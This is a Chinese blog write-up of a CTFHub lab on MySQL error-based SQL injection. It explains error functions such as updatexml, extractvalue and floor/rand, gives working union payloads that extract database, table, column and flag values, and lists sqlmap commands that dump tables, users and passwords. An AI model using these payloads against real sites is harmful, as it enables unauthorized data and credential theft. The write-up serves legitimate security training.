CTFHUB-技能树-Web题-SQL注入-报错注入

已于 2024-05-09 21:14:58 修改
阅读量587 收藏 4
点赞数 14
分类专栏: CTFHUB解题思路 文章标签: 前端 sql 数据库
于 2024-04-01 21:27:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Static______/article/details/137247172
版权

技能树-Web题-SQL注入-报错注入

文章目录

报错注入函数
loor函数
select count(*),(floor(rand(0)*2))x from table group by x;

select查询语句
group by进行分组(相同为一组)
rand()生成0到1的随机数
floor()返回整数
count()对数据整合(类似去重)

产生原因:mysql在执行该语句会建立一个虚拟表,表中有两个字段(一个是分组的值和一个计数的值),当分组已经存在后就会爆错。

参考:http://www.cnblogs.com/sfriend/p/11365999.html
extractvalue函数

限制长度为32位

and extractvalue(1,concat(0x7e,(select user()),0x7e));

该参数接受两个字符串参数,一个xml标记片段和一个xpath表达式,而第二参数要求xpath格式字符串,而我们不是所以报错。

参考:https://www.cnblogs.com/xishaonian/p/6250444.html
updatexml函数

限制长度为32位

and updatexml(1,concat(0x7e,(select user()),0x7e),1)

updatexml(1,2,3)第一个参数是string格式,为xml文档对象的名称,第二个参数为xpath格式的字符串,第三个string格式,替换查找到的符合条件的数据,由于第二个参数要xpath格式的字符串,因为不符合规则所以报错。

参考:http://blog.csdn.net/qq_37873738/article/details/88042610
name_const函数

只可获取数据库的版本信息

exp函数
exp(~(select * from(select user())a))

exp(int)该函数会返回值得x次方结果,当值超过mysql的范围就会爆错,上面payload的意思为:先查询user()的数据取名为a再select * from a将结果集a全部查询出来。

报错函数
报错函数:
floor()
extractvalue()
updatexml()
name_const()
join()
exp()
geometry collection()
polygon()
multipoint()
multlinestring()
multpolygon()
linestring()
参考:http://www.mamicode.com/info-detail-2366760.html
报错注入
判断注入点

输入1 查询到结果

在这里插入图片描述

尝试输入1‘ 出现报错

在这里插入图片描述

输入-1查询到结果

在这里插入图片描述

发现无论输入什么,都只会回显成功或者错误

能报错,说明存在注入点

爆库名

可以根据updatexml的报错注入来获取信息

1 union select 1,updatexml(1,concat(0x7e,(database()),0x7e),1)

updatexml (string, xpath_string, string)
第一个参数:可以输入1,为XML文档对象的名称
第二个参数:xpath_string ,提取多个子节点的文本
第三个参数:可以输入1,替换查找的符合条件的参数

0x7e是一个代表的十六进制,可以用’%’,或者’’来代替

在这里插入图片描述

爆表名
1 union select 1,updatexml(1,concat(0x7e,(select (group_concat(table_name)) from information_schema.tables where table_schema='sqli'),0x7e),1)

在这里插入图片描述

爆列名
1 union select 1,updatexml(1,concat(0x7e,(select  (group_concat(column_name)) from information_schema.columns where  table_name='flag'),0x7e),1)

在这里插入图片描述

爆数据
1 union select 1,updatexml(1,concat(0x7e,(select (group_concat(flag)) from sqli.flag),0x7e),1)

在这里插入图片描述

自动化sqlmap注入
sqlmap注入
查询sqlmap是否存在注入命令
sqlmap.py -u url/?id=1

查询当前用户下的所有数据库
sqlmap.py -u url/?id=1 --dbs

获取数据库的表名
sqlmap.py -u url/?id=1 -D (数据库名) --tables

获取表中的字段名
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) --columns

获取字段的内容
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump

查询数据库的所有用户
sqlmap.py -u url/?id=1 --users

查询数据库的所有密码
sqlmap.py -u url/?id=1 --passwords

查询数据库名称
sqlmap.py -u url/?id=1 --current-db
sqlmap各种注入技术

布尔类型的盲注,根据返回的页面的是或否,来判断对错的注入

时间类型的盲注,无法根据页面返还的信息判断任何信息,利用线程返还sleep(x)的时间,来判断对错的注入

联合查询注入,使用union联合注入

报错注入,根据页面返还错误信息进行注入

python炒粉
关注
  • 14
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
ctfhub web全部做记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
ctfhub技能树SQL注入报错注入
2303_81631620的博客
04-03 792
1.判断注入类型,场景中仅仅将SQL语句带入查询返回页面正确,没有返回点的时候,需要报错注入,用报错的回显extractvalue报错注入:0x7e就是~用来区分数据里面用select语句,不能用union selectconcat()函数1).功能:将多个字符串连接成一个字符串。2).语法:concat(str1,str2,…)返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null。2.查询当前使用的数据库报错,出现库名 sqli3.
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
vue+element-ui+websql
04-19
使用vue+elemetnui框架,采用websql/localsotrage作为数据存储,实现增删改查
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
CTFHUB-技能树-Web-SQL注入-布尔盲注
Static______的博客
04-02 599
由于返回值是正确或错误,寻常and 后面布尔盲注语句不好使,因为它们是根据查询结果为空来判断。输入1 (也可输入1 and 1=1)返回 query_success。输入1’ (也可输入1 and 1=2)返回query_error。发现1 and length(database()) >=1 正确。1 and length(database()) >=5 错误。1 and length(database()) >=4正确。要一个一个判断有点难,可以用python脚本。这时候想到用if语句。
CTFHUB-WEB-SQL注入-报错注入
weixin_43486981的博客
08-10 708
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 目: 靶机环境:输入1时,显示正确 输入一个随意的字符串后,显示错误。 求数据库名:输入1 union select updatexml(1,concat(0x7e,database(),0x7e),1);,页面报错: 求表名:输入1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information
CTFHub - 报错注入
Have_a_great_day的博客
09-09 534
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHUB-技能树-WEB-SQL注入
慢就是快
04-16 297
文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
SQL注入报错注入函数
热门推荐
lightsec
03-15 1万+
前言 报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。 常用报错函数 updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数 extractvalue() 是mysql对xml文档数据进行查询的xpa...
CTFHub | 报错注入
尼泊罗河伯的博客
10-28 2483
因为报错注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
CtfhubSQL注入|SQL报错注入及原理详解
tempulcc的博客
10-10 1466
手工测试sql注入及原理1、SQL 整数型注入查数据库名查数据表查flag表字段2、字符型注入3、报错注入updatexml() 函数致MYSQL显错注入原理updatexml() 函数定义updatexml() 函数运行机制updatexml() 函数运行示例不报错示例构造报错利用updatexml()测试ctfhub的显错注入 1、SQL 整数型注入 查数据库名 -1 union select group_concat(schema_name),2 from information_schema.sch
sql注入——报错注入
m0_73756016的博客
10-18 1309
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
Vue3实战笔记(52)—Vue 3封装持仓分析饼图
山花的博客
05-30 500
接上文,封装持仓分析饼图。封装好几个组件,用于后续开发。把忧愁煮成茶,让它在心间慢慢沉淀,剩下的,便是清甜的回味。
记录一次前端页面崩溃的产生及处理
最新发布
weixin_51123079的博客
05-30 495
记录一次前端页面崩溃的产生及处理
【JS实战案例汇总——不定时更新版】
微木
05-30 328
练习JS的实用案例,倒计时算法、定时轮播图
ctfhub web技能树302跳转
07-28
CTFHubWeb技能树中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过参数-C -实现断点续传,即在下载过程中按Ctrl + C停止下载,下次可以接着上次的进度继续下载。这样可以节省时间,避免重复下载已经下载过的部分。 在某些情况下,302跳转可能会受到黑名单的限制。根据引用\[3\],黑名单可能限制了特定的网段,如127、172、10、192网段。然而,可以通过使用localhost的方式绕过这些限制。例如,将http://127.0.0.1/flag.php转换为短网址,并构造Payload发送请求,利用302跳转可以获取到flag。 总结来说,302跳转是一种常见的Web技术,可以用于重定向请求。在CTFHubWeb技能树中,了解如何使用302跳转以及如何绕过黑名单限制是很重要的。 #### 引用[.reference_title] - *1* *2* [2.CTFhub技能树 web前置技能 http协议 302跳转](https://blog.csdn.net/FFFFFFMVPhat/article/details/121342556)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树 Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值